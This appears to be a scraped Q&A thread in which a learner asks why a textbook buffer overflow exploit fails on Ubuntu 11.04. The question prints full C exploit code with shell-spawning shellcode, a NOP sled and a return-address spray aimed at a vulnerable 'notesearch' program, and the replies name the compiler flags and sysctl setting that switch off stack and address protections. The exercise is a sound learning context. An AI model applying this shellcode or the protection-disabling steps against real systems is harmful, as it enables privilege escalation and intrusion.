Disabling Stack Smashing Protection in Ubuntu 11.04

gcc ubuntu stack overflow buffer

11,457

I'm a bit more informed on what's going on now. The given code constructs a buffer and then passes it to a program called notesearch that has a buffer overflow vulnerability. I didn't figure out how to disable the protective measures on the current version of ubuntu, but the methods I tried do work on my Ubuntu 9.10 virtual machine. That is, -fno-stack-protector works as a gcc flag, and when paired with sysctl kernel.randomize_va_space=0, buffer overflows that execute shellcode on the stack are permitted. A bit of a workaround, but running my VM suits me well and allows me to continue through the examples in this book. It's a great book if you're interested in learning exploits. Here it is

11,457

Author by

Emmett Butler

Python/data hacker @ Parse.ly

Updated on June 04, 2022

Comments

Emmett Butler almost 2 years

I'm running 32-bit Ubuntu 11.04 on a 2007 MacBook, and I'm just starting to learn about buffer overflow exploits. I'm trying to run the example programs from a book, but Ubuntu's security measures are making it impossible for me to successfully execute a buffer overflow. Here's the code I'm attempting to run:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}

I would like this code to result in a segfault, but every time I run it, it quits with the error "stack smashing detected". I've tried compiling (using gcc) with the following options:

-fno-stack-protector -D_FORTIFY_SOURCE=0 -z execstack

in various combinations, as well as all together. I've also tried $ sysctl -w kernel.randomize_va_space=0 followed by a recompile, with no success.

It would be much appreciated if anyone could shed light on the correct way to execute a buffer overflow, given Ubuntu's built-in security measures

aniliitb10 about 9 years

actually ./notesearch has buffer overflow vulnerability!!
Vincent about 6 years

I recompiled my program with -fno-stack-protector (compiler and linker options) and still have a smash detection. I tried also adding -z execstack. I looked at the program symbols and there is still a __stack_chk_fail function.